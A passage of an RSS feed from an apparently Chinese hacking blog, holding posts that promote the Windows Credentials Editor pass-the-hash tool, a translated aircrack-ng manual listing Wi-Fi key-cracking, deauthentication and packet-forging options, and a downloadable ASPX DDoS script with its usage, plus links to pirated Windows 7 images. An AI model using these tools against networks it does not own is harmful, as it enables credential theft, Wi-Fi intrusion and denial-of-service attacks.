8.北京时间2月20日17点，添加英文专业版（批量授权）32位电驴链接，该文件已经100%上传至迅雷云端，迅雷会员可以用离线下载获取，测试下载速度约为300kb/s, 非迅雷会员可等速度起来后下载。64位上传进度为74%，请持续关注。<br />
9.北京时间2月20日19点, 添加英文专业版（批量授权）64位电驴链接，该文件已经100%上传至迅雷云端，迅雷会员可以用离线下载获取，测试下载速度最高可达1MB/s, 非迅雷会员可等速度起来后下载。<br />
10.北京时间2月22日凌晨5点，添加中文版相关信息，期待下载链接中。。。<br />
11.北京时间2月22日7点,添加中文版32位企业版和旗舰版，这两个文件为景友clemond发布。<br />
12.北京时间2月22日17点,添加中文版64位旗舰版,32位企业版和旗舰版经核实MSDN 发布的链接和Clemond发布的相同，因Clemond在先，故仍然标注来自Clemond。另外，因为部分网友反馈下载的英文专业版SHA1与旗舰版相同，本人已经和MSDN I Tell You管理员取得联系，经查，这两个下载链接确实为PRO版本的链接。管理员建议使用Xtreme8.0下载。<br />
13.北京时间2月22日18点,添加来自于MSDN I Tell You管理员关于英文专业版的校验文件, 以及文件SHA1校验工具 IHasher.<br />
14.北京时间2月22日20点,添加中文32位旗舰版BT种子，该种子由景友sooyun制作<br />
15.北京时间2月23日0点，添加SP1补丁包微软官网下载链接。<br />
16.北京时间2月23日16点，添加中文专业版32位电驴链接，来源于MSDN I Tell You；同时添加中文旗舰版64位BT种子，来源于景友parick。添加32位和64位分开的SP1安装包，该链接本来由某远景工作人员添加，特此感谢，但似乎链接不可用（可能是我移动时不小心造成的），本人重新编辑。<br />
17.北京时间2月23日17点，添加中文专业版32位和64位BT种子，该种子由景友jattyshen发布.<br />
18.北京时间2月24日凌晨1点，添加32位和64位中文家庭基础版和家庭高级版电驴链接，来源于MSDN I Tell You。<br />
19.北京时间2月24日凌晨3点，补上64位中文专业版电驴链接，来源于MSDN I Tell You，多谢景友heihac2600提醒。<br />
20.北京时间2月24日17点，添加64位中文企业版和32位，64位中文专业版（批量授权）电驴链接，来源于MSDN I Tell You，感谢景友zhangmu的热心提醒。另外，经网友建议，添加系统中文名。撤掉12楼英文专业版（批量授权）飞速网下载链接。<br />
21.北京时间2月25日20点,添加中文64位旗舰版BT种子，来源于景友sooyun，本人亲自下载验证此版本为原版，与parick发布的种子相比，sooyun的种子发布时间更早，经确认，为首发。<br />
22.北京时间3月1日,取消阅读限制，并条理版面。<br />
23.北京时间3月3日凌晨1点，添加中文初级版，来自于MSDN I Tell You.</span></p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2011年04月4日 -- <a href="http://www.4shell.org/archives/1864.html" title="5分钟下完Window7">5分钟下完Window7</a></li><li>2009年05月17日 -- <a href="http://www.4shell.org/archives/780.html" title="Windows 7 RC 7100 GDI驱动Win32k.sys内核D.O.S漏洞">Windows 7 RC 7100 GDI驱动Win32k.sys内核D.O.S漏洞</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1862.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>内网渗透新杀器</title>
		<link>http://www.4shell.org/archives/1849.html</link>
		<comments>http://www.4shell.org/archives/1849.html#comments</comments>
		<pubDate>Mon, 08 Nov 2010 03:05:17 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[资源共享]]></category>
		<category><![CDATA[Pass the hash]]></category>
		<category><![CDATA[wce]]></category>
		<category><![CDATA[Windows Credentials Editor]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1849.html</guid>
		<description><![CDATA[10月12日Pass-The-Hash toolkit的作者在mailist发布了新版的Pass The Hash Attack tool -- Windows Credentials Editor，简称wce。 单个文件集成了列举、添加、更改credentials的功能，再也不用拖着几个exe和dll文件到处跑了，而且体积仅仅137KB，内网渗透手必备工具. Windows Credentials Editor v1.0 Supports Windows XP, 2003, Vista, 7 and 2008 (Vista was not actually tested yet, but it should work). Windows Credentials Editor (WCE) allows to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes). This can [...]]]></description>
			<content:encoded><![CDATA[<p><strong>10月12日</strong><a href="http://oss.coresecurity.com/pshtoolkit/doc/index.html" target="_blank"><strong><span style="color: #333399;">Pass-The-Hash toolkit</span></strong></a><strong>的</strong><a href="http://hexale.blogspot.com/" target="_blank"><strong><span style="color: #333399;">作者</span></strong></a><strong>在</strong><a href="http://seclists.org/fulldisclosure/2010/Oct/162" target="_blank"><strong><span style="color: #333399;">mailist</span></strong></a><strong>发布了新版的Pass The Hash Attack tool -- Windows Credentials Editor，简称wce。<br />
单个文件集成了列举、添加、更改credentials的功能，再也不用拖着几个exe和dll文件到处跑了，而且体积仅仅137KB，内网渗透手必备工具. </strong></p>
<pre>Windows Credentials Editor v1.0
Supports Windows XP, 2003, Vista, 7 and 2008 (Vista was not actually
tested yet, but it should work).
Windows Credentials Editor (WCE) allows to list logon sessions and add,
change, list and delete associated credentials (ex.: LM/NT hashes). This
can be used, for example, to perform pass-the-hash on Windows and also
obtain NT/LM hashes from memory (from interactive logons, services,
remote desktop connections, etc.) which can be used in further attacks.
You can find it here:
<a href="http://www.ampliasecurity.com/research/wce_v1.0.tgz" target="_blank"><span style="color: #333399;">http://www.ampliasecurity.com/research/wce_v1.0.tgz</span></a></pre>
<p><a href="http://www.pcsec.org/upload/2010/10/wce.png"><img src="http://www.4shell.org/wp-content/uploads/images/2010/11/03090128G.jpg" alt="" /></a><br />
<span id="more-1849"></span><br />
<a href="http://www.pcsec.org/upload/2010/10/wce_1.png"><img src="http://www.4shell.org/wp-content/uploads/images/2010/11/030916KFm.jpg" alt="" /></a></p>
<p><a href="http://www.pcsec.org/upload/2010/10/wce_2.png"><img src="http://www.4shell.org/wp-content/uploads/images/2010/11/030922Bj5.jpg" alt="" /></a></p>
<h2  class="related_post_title">随机日志</h2><ul class="related_post"><li>2009年02月28日 -- <a href="http://www.4shell.org/archives/742.html" title="利用注册表读hash">利用注册表读hash</a></li><li>2009年12月14日 -- <a href="http://www.4shell.org/archives/1341.html" title="Linux下渗透嗅探术">Linux下渗透嗅探术</a></li><li>2009年08月27日 -- <a href="http://www.4shell.org/archives/1054.html" title="BT4 pre Final下spoonwep2和spoonwpa整合方法">BT4 pre Final下spoonwep2和spoonwpa整合方法</a></li><li>2007年11月19日 -- <a href="http://www.4shell.org/archives/244.html" title="autorun.inf完全操作手册">autorun.inf完全操作手册</a></li><li>2009年11月14日 -- <a href="http://www.4shell.org/archives/1166.html" title="专家：Adobe Flash安全策略的风险高">专家：Adobe Flash安全策略的风险高</a></li><li>2009年09月24日 -- <a href="http://www.4shell.org/archives/1124.html" title="深圳大学2009届校长章必功毕业致辞">深圳大学2009届校长章必功毕业致辞</a></li><li>2008年10月11日 -- <a href="http://www.4shell.org/archives/363.html" title="backtrack 3(BT3) usb版 破解WEP无线网络密码详细步骤">backtrack 3(BT3) usb版 破解WEP无线网络密码详细步骤</a></li><li>2007年11月18日 -- <a href="http://www.4shell.org/archives/243.html" title="0.01秒关闭网页">0.01秒关闭网页</a></li><li>2008年11月4日 -- <a href="http://www.4shell.org/archives/539.html" title="Discuz! admin\runwizard.inc.php get-webshell bug">Discuz! admin\runwizard.inc.php get-webshell bug</a></li><li>2007年08月7日 -- <a href="http://www.4shell.org/archives/231.html" title="一步就可以防止网络剪刀网络执法官等的方法">一步就可以防止网络剪刀网络执法官等的方法</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1849.html/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>AirCrack的中文手册</title>
		<link>http://www.4shell.org/archives/1836.html</link>
		<comments>http://www.4shell.org/archives/1836.html#comments</comments>
		<pubDate>Sat, 07 Aug 2010 01:59:49 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[资源共享]]></category>
		<category><![CDATA[AirCrack]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1836.html</guid>
		<description><![CDATA[//-------------------------------------------------------------------- // AirCrack中文手册 1.0 // 翻译:GaA.Ra(zhoufan#yahoo.cn) // 随意转载,但请保留此部分信息,谢谢 //-------------------------------------------------------------------- /************************************************************ 1.AirCrack-ng Aircrack is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, thus making the attack much faster compared to other WEP [...]]]></description>
			<content:encoded><![CDATA[<p>//--------------------------------------------------------------------<br />
// AirCrack中文手册 1.0<br />
// 翻译:GaA.Ra(zhoufan#yahoo.cn)<br />
// 随意转载,但请保留此部分信息,谢谢<br />
//-------------------------------------------------------------------- </p>
<p>/************************************************************<br />
1.AirCrack-ng<br />
Aircrack is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, thus making the attack much faster compared to other WEP cracking tools. In fact, aircrack is a set of tools for auditing wireless networks.<br />
Aircrack是一个802.11协议WEP和WPA-PSK密钥P解程序,能够恢复出密钥当抓取了足够的数据包的时候.它执行标准FMS攻击并提供一些优化(算法)像Korek攻击,因此相比其他WEPP解工具能够更加快的进行攻击.事实上,Aircrack是一系列的工具用以审计无线网络.<br />
Aircrack-ng 1.0 r1645 - (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe<br />
Original work: Christophe Devine </p>
<p>http://www.aircrack-ng.org</p>
<p>usage: aircrack-ng [options] <.cap / .ivs file(s)><br />
使用方法: aircrack-ng [选项] <.cap 或 .ivs文件> </p>
<p>Common options: //命令选项<br />
-a <amode> : force attack mode (1/WEP, 2/WPA-PSK) //设置攻击模式(1是WEP,2是WPA-PSK)<br />
-e <essid> : target selection: network identifier //目标选择:网络标识(如TP-LINK)<br />
-b <bssid> : target selection: access point's MAC //目标选择:AP的MAC地址<br />
-p <nbcpu> : # of CPU to use (default: all CPUs) //使用的CPU(缺省值:全部CPU)<br />
-q : enable quiet mode (no status output) //开启安静模式(不输出状态)<br />
-C <macs> : merge the given APs to a virtual one //归并给的AP到一个虚拟的<br />
-l <file> : write key to file //把密钥key写入文件<br />
<span id="more-1836"></span><br />
Static WEP cracking options: //静态WEPP解选项<br />
-c : search alpha-numeric characters only //只搜索字母和数字的字符<br />
-t : search binary coded decimal chr only //只搜索二-十进制的字符<br />
-h : search the numeric key for Fritz!BOX //搜索数字密钥(给Fritz!BOX)<br />
-d <mask> : use masking of the key (A1:XX:CF:YY) //使用密钥掩码,就是用户提供密钥片段<br />
-m <maddr> : MAC address to filter usable packets //MAC地址用以过滤掉无用数据包<br />
-n <nbits> : WEP key length : 64/128/152/256/512 //WEP密钥长度:64/128/152/256/512<br />
-i <index> : WEP key index (1 to 4), default: any //WEP密钥索引(1至4),缺省值:任何<br />
-f <fudge> : bruteforce fudge factor, default: 2 //穷举猜测因子,缺省值:2<br />
-k <korek> : disable one attack method (1 to 17) //取消Korek的某一种攻击方法(1到17)<br />
-x or -x0 : disable bruteforce for last keybytes //取消最后一个密钥字节的穷举<br />
-x1 : last keybyte bruteforcing (default) //最后一个密钥字节进行穷举(缺省)<br />
-x2 : enable last 2 keybytes bruteforcing //设置最后两个密钥字节进行穷举<br />
-y : experimental single bruteforce mode //实验性的单一穷举模式<br />
-K : use only old KoreK attacks (pre-PTW) //只是用旧KoreK攻击(Pre-PTW方式)<br />
-s : show the key in ASCII while cracking //P解时显示密钥的ASCII值<br />
-M <num> : specify maximum number of IVs to use //指定最大使用的IVs(初始向量)<br />
-D : WEP decloak, skips broken keystreams //WEP伪装,跳过坏掉的密钥流<br />
-P <num> : PTW debug: 1: disable Klein, 2: PTW //PTW排错:1:取消Klein(方式),2:PTW<br />
-1 : run only 1 try to crack key with PTW //只运行一次尝试用PTWP解密钥 </p>
<p>WEP and WPA-PSK cracking options: //WEP和WPA-PSKP解选项<br />
-w <words> : path to wordlist(s) filename(s) //字典文件路径<br />
-r <DB> : path to airolib-ng database //airolib-ng数据库路径,不能和-w选项同时用<br />
(Cannot be used with -w) </p>
<p>--help : Displays this usage screen //显示这个帮助界面 </p>
<p>2.Airdecap-ng<br />
decrypts WEP/WPA capture files. Part of the aircrack suite.<br />
解密抓到的WEP/WPA数据包,是AirCrack(工具)组的一部分. //将数据包解密后可以看到明文,查找关键信息<br />
Airdecap-ng 1.0 r1645 - (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe<br />
Original work: Christophe Devine </p>
<p>http://www.aircrack-ng.org</p>
<p>usage: airdecap-ng [options]
<pcap file>
使用方法: airdecap-ng [选项]
<pcap文件>
<p>Common options: //命令选项<br />
-l : don't remove the 802.11 header //不要去除802.11头部<br />
-b <bssid> : access point MAC address filter //AP的MAC地址用以过滤<br />
-e <essid> : target network SSID //目标网络SSID(如TP-LINK) </p>
<p>WEP specific option: //WEP特殊选项<br />
-w <key> : target network WEP key in hex //目标网络十六进制WEP密钥 </p>
<p>WPA specific options: //WPA特殊选项<br />
-p
<pass> : target network WPA passphrase //目标网络WPA密码<br />
-k
<pmk> : WPA Pairwise Master Key in hex //WPA十六进制成对主密钥(PMK) </p>
<p>--help : Displays this usage screen //显示这个帮助界面 </p>
<p>3.Aireplay-ng<br />
802.11 packet injection program. Part of the aircrack suite.<br />
802.11数据包注入程序.是AirCrack(工具)组的一部分.<br />
Aireplay-ng 1.0 r1645 - (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe<br />
Original work: Christophe Devine </p>
<p>http://www.aircrack-ng.org</p>
<p>usage: aireplay-ng<br />
<options> <replay interface><br />
使用方法: aireplay-ng <选项> <重放攻击接口> </p>
<p>Filter options: //过滤器选项<br />
-b bssid : MAC address, Access Point //AP的MAC地址<br />
-d dmac : MAC address, Destination //目标MAC地址<br />
-s smac : MAC address, Source //源MAC地址<br />
-m len : minimum packet length //数据包最小长度<br />
-n len : maximum packet length //数据包最大长度<br />
-u type : frame control, type field //帧控制,type域<br />
-v subt : frame control, subtype field //帧控制,subtype域<br />
-t tods : frame control, To DS bit //帧控制,ToDS位<br />
-f fromds : frame control, From DS bit //帧控制,FromDS位<br />
-w iswep : frame control, WEP bit //帧控制,WEP位<br />
-D : disable AP detection //取消AP探测 </p>
<p>Replay options: //重放攻击选项<br />
-x nbpps : number of packets per second //每秒发送数据包数<br />
-p fctrl : set frame control word (hex) //设置帧控制字(十六进制)<br />
-a bssid : set Access Point MAC address //设置AP的MAC地址<br />
-c dmac : set Destination MAC address //设置目标MAC地址<br />
-h smac : set Source MAC address //设置源目标MAC地址<br />
-g value : change ring buffer size (default: 8) //改变环形缓冲区大小(缺省值:8)<br />
-F : choose first matching packet //选择第一个匹配的数据包 </p>
<p>Fakeauth attack options: //伪连接攻击选项<br />
-e essid : set target AP SSID //设置目标AP的SSID(如TP-LINK)<br />
-o npckts : number of packets per burst (0=auto, default: 1) //每组数据包数(0为自动,缺省值:1)<br />
-q sec : seconds between keep-alives //发送keep-alives包的间隔时间<br />
-y prga : keystream for shared key auth //共享密钥认证的密钥流<br />
-T n : exit after retry fake auth request n time //当重复尝试n次伪连接失败后退出 </p>
<p>Arp Replay attack options: //Arp重放攻击选项<br />
-j : inject From DS packets //从DS数据包注入 </p>
<p>Fragmentation attack options: //碎片攻击选项<br />
-k IP : set destination IP in fragments //设置碎片里的目标IP<br />
-l IP : set source IP in fragments //设置碎片里的源IP </p>
<p>Test attack options: //测试攻击选项<br />
-B : activates the bitrate test //激活比特率(码率)测试 </p>
<p>Source options: //源选项<br />
-i iface : capture packets from this interface //从指定接口里抓取数据包<br />
-r file : extract packets from this pcap file //从指定pcap文件里提取数据包 </p>
<p>Miscellaneous options: //其他选项<br />
-R : disable /dev/rtc usage //取消/dev/rtc的使用 </p>
<p>Attack modes (numbers can still be used): //攻击模式(数字仍然可以使用)<br />
--deauth count : deauthenticate 1 or all stations (-0) //解除一个或者全部站的连接<br />
--fakeauth delay : fake authentication with AP (-1) //对AP进行伪连接攻击<br />
--interactive : interactive frame selection (-2) //交互注入攻击<br />
--arpreplay : standard ARP-request replay (-3) //标准Arp请求包重放攻击<br />
--chopchop : decrypt/chopchop WEP packet (-4) //解码或断续WEP数据包攻击<br />
--fragment : generates valid keystream (-5) //产生合法密钥流<br />
--caffe-latte : query a client for new IVs (-6) //向一个客户端查询新IV(初始向量)<br />
--cfrag : fragments against a client (-7) //对一个客户端的片段<br />
--test : tests injection and quality (-9) //测试注入和质量 </p>
<p>--help : Displays this usage screen //显示这个帮助界面 </p>
<p>4.Airmon-ng<br />
a utility to check an wifi interfaces status and placing the interface into monitor mode. Part of the aircrack suite.<br />
一个用来检查wifi接口状态和更改接口进入监控模式的工具.是AirCrack(工具)组的一部分.<br />
usage: airmon-ng <start|stop|check> <interface> [channel or frequency]<br />
使用方法: airmon-ng <start或stop或check> <接口> [信道或频率] </p>
<p>5.Airodump-ng<br />
802.11 packet capture program. Part of the aircrack suite.<br />
802.11数据包抓包程序.是AirCrack(工具)组的一部分.<br />
Airodump-ng 1.0 r1645 - (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe<br />
Original work: Christophe Devine </p>
<p>http://www.aircrack-ng.org</p>
<p>usage: airodump-ng<br />
<options> <interface>[,<interface>,...]<br />
使用方法: airodump-ng <选项> <接口>[,<接口>,...] </p>
<p>Options: //选项<br />
--ivs : Save only captured IVs //只保存初始向量数据包<br />
--gpsd : Use GPSd //使用GPSd<br />
--write
<prefix> : Dump file prefix //转储文件名前缀<br />
-w : same as --write //和--write相同<br />
--beacons : Record all beacons in dump file //在转储文件里记录所有信标<br />
--update <secs> : Display update delay in seconds //显示校正延迟时间<br />
--showack : Prints ack/cts/rts statistics //显示ack,cts,rts统计<br />
-h : Hides known stations for --showack //对--showack命令隐藏已知站点<br />
-f <msecs> : Time in ms between hopping channels //跳跃信道的时间,毫秒表示<br />
--berlin <secs> : Time before removing the AP/client //从屏幕移除AP或客户端的时间<br />
from the screen when no more packets//当没有收到更多数据包的时候<br />
are received (Default: 120 seconds) //缺省值是120秒<br />
-r <file> : Read packets from that file //从指定文件中读取数据包<br />
-x <msecs> : Active Scanning Simulation //模拟主动扫描<br />
--output-format </p>
<formats> : Output format. Possible values: //输出格式.可能的取值:如下行<br />
pcap, ivs, csv, gps, kismet, netxml </p>
<p>Filter options: //过滤器选项<br />
--encrypt <suite> : Filter APs by cipher suite //通过加密方式过滤AP<br />
--netmask <netmask> : Filter APs by mask //通过掩码过滤AP<br />
--bssid <bssid> : Filter APs by BSSID //通过BSSID过滤AP<br />
-a : Filter unassociated clients //过滤无客户端连接 </p>
<p>By default, airodump-ng hop on 2.4Ghz channels. //通常airodump-ng在2.4Ghz的信道上跃变<br />
You can make it capture on other/specific channel(s) by using://你可以让它抓取其他(特定)信道<br />
--channel <channels>: Capture on specific channels //抓取指定信道<br />
--band <abg> : Band on which airodump-ng should hop//airodump-ng跃变的频带<br />
-C <frequencies> : Uses these frequencies in MHz to hop//使用这些频率(单位MHz)跃变<br />
--cswitch <method> : Set channel switching method //设置信道转换的方法<br />
0 : FIFO (default) //先进先出(缺省)<br />
1 : Round Robin //循环<br />
2 : Hop on last //最后一次跃变<br />
-s : same as --cswitch //功能如--cswitch </p>
<p>--help : Displays this usage screen //显示这个帮助界面 </p>
<p>6.Packetforge-ng<br />
BackTrack工具列表中没有工具说明,这是一个伪造数据包的工具<br />
Packetforge-ng 1.0 r1645 - (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe<br />
Original work: Christophe Devine and Martin Beck </p>
<p>http://www.aircrack-ng.org</p>
<p>Usage: packetforge-ng <mode><br />
<options>
使用方法: packetforge-ng <模式> <选项> </p>
<p>Forge options: //伪造选项<br />
-p <fctrl> : set frame control word (hex) //设置帧控制字(十六进制)<br />
-a <bssid> : set Access Point MAC address //设置AP的MAC地址<br />
-c <dmac> : set Destination MAC address //设置目标MAC地址<br />
-h <smac> : set Source MAC address //设置源MAC地址<br />
-j : set FromDS bit //设置FromDS位<br />
-o : clear ToDS bit //设置ToDS位<br />
-e : disables WEP encryption //取消WEP加密<br />
-k <ip[:port]> : set Destination IP [Port] //设置目标IP[端口]<br />
-l <ip[:port]> : set Source IP [Port] //设置源IP[端口]<br />
-t ttl : set Time To Live //设置存活时间<br />
-w <file> : write packet to this pcap file //将数据包写入指定pcap文件<br />
-s <size> : specify size of null packet //指定空数据包的大小<br />
-n
<packets> : set number of packets to generate//设置要产生的数据包数目 </p>
<p>Source options: //源选项<br />
-r <file> : read packet from this raw file //从指定原始文件读取数据包<br />
-y <file> : read PRGA from this file //从指定文件读取PRGA(WEP加密中间量) </p>
<p>Modes: //模式<br />
--arp : forge an ARP packet (-0) //伪造ARP数据包<br />
--udp : forge an UDP packet (-1) //伪造UDP数据包<br />
--icmp : forge an ICMP packet (-2) //伪造ICMP数据包<br />
--null : build a null packet (-3) //建一个空的数据包<br />
--custom : build a custom packet (-9) //建一个自定义数据包 </p>
<p>--help : Displays this usage screen //显示这个帮助界面 </p>
<p>7.Airolib-ng<br />
BackTrack工具列表中没有工具说明,这是进行WPA Rainbow Table攻击时使用,用于建立特定数据库文件.(by 杨哲)<br />
Airolib-ng 1.0 r1645 - (C) 2007, 2008, 2009 ebfe </p>
<p>http://www.aircrack-ng.org</p>
<p>Usage: airolib-ng <database> <operation> [options]<br />
使用方法: airolib-ng <数据库> <操作> [选项] </p>
<p>Operations: //操作<br />
--stats : Output information about the database. //输出数据库信息<br />
--sql <sql> : Execute specified SQL statement. //执行指定的SQL语句<br />
--clean [all] : Clean the database from old junk. 'all' will also //从数据库清理旧的无用数据.'all'选项<br />
reduce filesize if possible and run an integrity check. //将会减少文件大小如果可以,同时对数据<br />
//库进行一次完整性校验<br />
--batch : Start batch-processing all combinations of ESSIDs //开始批处理所有ESSID和密码的组合<br />
and passwords.<br />
--verify [all] : Verify a set of randomly chosen PMKs. //验证一组随机选择的PMK<br />
If 'all' is given, all invalid PMK will be deleted. //'all'选项会使所有不合法的PMK被删除<br />
--import [essid|passwd] <file> :<br />
Import a text file as a list of ESSIDs or passwords. //导入文件文件作为ESSID或者密码清单<br />
--import cowpatty <file> :<br />
Import a cowpatty file. //导入一个cowpatty文件<br />
--export cowpatty <essid> <file> :<br />
Export to a cowpatty file. //导出一个cowpatty文件 </p>
<h2  class="related_post_title">随机日志</h2><ul class="related_post"><li>2009年01月5日 -- <a href="http://www.4shell.org/archives/711.html" title="MSDN Windows XP Professional x64 Edition with SP2 &#8211; VL (English)+简体中文语言包">MSDN Windows XP Professional x64 Edition with SP2 &#8211; VL (English)+简体中文语言包</a></li><li>2007年11月24日 -- <a href="http://www.4shell.org/archives/249.html" title="SERV-U 6.4提权方法,通杀SERV-U版本">SERV-U 6.4提权方法,通杀SERV-U版本</a></li><li>2006年10月28日 -- <a href="http://www.4shell.org/archives/85.html" title="十大Web 2.0攻击向量">十大Web 2.0攻击向量</a></li><li>2009年08月27日 -- <a href="http://www.4shell.org/archives/1061.html" title="Infiltrating a Botnet">Infiltrating a Botnet</a></li><li>2008年11月24日 -- <a href="http://www.4shell.org/archives/659.html" title="Microsoft XML Core Services DTD Cross-Domain Scripting PoC MS08-069">Microsoft XML Core Services DTD Cross-Domain Scripting PoC MS08-069</a></li><li>2008年12月1日 -- <a href="http://www.4shell.org/archives/676.html" title="Yahoo webmail xss&#038;OWA xss">Yahoo webmail xss&#038;OWA xss</a></li><li>2008年10月20日 -- <a href="http://www.4shell.org/archives/450.html" title="共享一个键盘记录的源码">共享一个键盘记录的源码</a></li><li>2008年10月13日 -- <a href="http://www.4shell.org/archives/399.html" title="Wordpress的SQL Column Trunction 漏洞">Wordpress的SQL Column Trunction 漏洞</a></li><li>2009年08月7日 -- <a href="http://www.4shell.org/archives/1001.html" title="从内存中加载并启动一个exe(C++版)">从内存中加载并启动一个exe(C++版)</a></li><li>2008年10月30日 -- <a href="http://www.4shell.org/archives/507.html" title="入门级情色英文">入门级情色英文</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1836.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>再分享一个aspx的ddos脚本</title>
		<link>http://www.4shell.org/archives/1787.html</link>
		<comments>http://www.4shell.org/archives/1787.html#comments</comments>
		<pubDate>Wed, 23 Jun 2010 15:22:18 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[资源共享]]></category>
		<category><![CDATA[ASPX]]></category>
		<category><![CDATA[DDOS]]></category>
		<category><![CDATA[压力测试]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1787.html</guid>
		<description><![CDATA[点击↑小图放大 效果没有下面那个PHP的明显。 既然群里面的朋友要，也放出来吧。 使用方法：填写IP地址 端口 线程 AddtoAttack 有朋友说看不懂，我囧，英文在稀烂，猜也猜的到这几个功能。 下载地址： 点击下载 相关文章2010年06月23日 -- 分享国外一个PHP DDOS的脚本2010年06月13日 -- Linux下压力测试综合对比2009年09月23日 -- 应对服务器被DDOS攻击的紧急措施2008年10月30日 -- ASPXshell MS08-067插件2008年10月10日 -- ScanWriterable.aspx扫描权限2008年06月28日 -- ddos原理2007年11月19日 -- 反黑经验：深入了解 DDoS与 DDoS追踪2007年03月13日 -- 因特网根服务器成功经受住2月DDOS攻击2006年11月11日 -- 10月28号安全焦点DDOS事件背后内幕串串烧2006年09月25日 -- 分布式拒绝攻击(DDOS)软件tfn2k攻防]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.4shell.org/wp-content/uploads/2010/06/20100623aspxddos.jpg"><img class="alignnone size-medium wp-image-1786" title="20100623aspxddos" src="http://www.4shell.org/wp-content/uploads/2010/06/20100623aspxddos-300x173.jpg" alt="" width="300" height="173" /></a></p>
<p>点击↑小图放大</p>
<p>效果没有下面那个PHP的明显。<br />
既然群里面的朋友要，也放出来吧。<br />
使用方法：填写IP地址 端口 线程 AddtoAttack<br />
有朋友说看不懂，我囧，英文在稀烂，猜也猜的到这几个功能。</p>
<p>下载地址：<br />
<span id="more-1787"></span><br />
<a href="http://www.4shell.org/upload/20100623aspxddos.rar"> 点击下载</a></p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2010年06月23日 -- <a href="http://www.4shell.org/archives/1785.html" title="分享国外一个PHP DDOS的脚本">分享国外一个PHP DDOS的脚本</a></li><li>2010年06月13日 -- <a href="http://www.4shell.org/archives/1782.html" title="Linux下压力测试综合对比">Linux下压力测试综合对比</a></li><li>2009年09月23日 -- <a href="http://www.4shell.org/archives/1122.html" title="应对服务器被DDOS攻击的紧急措施">应对服务器被DDOS攻击的紧急措施</a></li><li>2008年10月30日 -- <a href="http://www.4shell.org/archives/503.html" title="ASPXshell MS08-067插件">ASPXshell MS08-067插件</a></li><li>2008年10月10日 -- <a href="http://www.4shell.org/archives/343.html" title="ScanWriterable.aspx扫描权限">ScanWriterable.aspx扫描权限</a></li><li>2008年06月28日 -- <a href="http://www.4shell.org/archives/292.html" title="ddos原理">ddos原理</a></li><li>2007年11月19日 -- <a href="http://www.4shell.org/archives/246.html" title="反黑经验：深入了解 DDoS与 DDoS追踪">反黑经验：深入了解 DDoS与 DDoS追踪</a></li><li>2007年03月13日 -- <a href="http://www.4shell.org/archives/156.html" title="因特网根服务器成功经受住2月DDOS攻击">因特网根服务器成功经受住2月DDOS攻击</a></li><li>2006年11月11日 -- <a href="http://www.4shell.org/archives/110.html" title="10月28号安全焦点DDOS事件背后内幕串串烧">10月28号安全焦点DDOS事件背后内幕串串烧</a></li><li>2006年09月25日 -- <a href="http://www.4shell.org/archives/30.html" title="分布式拒绝攻击(DDOS)软件tfn2k攻防">分布式拒绝攻击(DDOS)软件tfn2k攻防</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1787.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

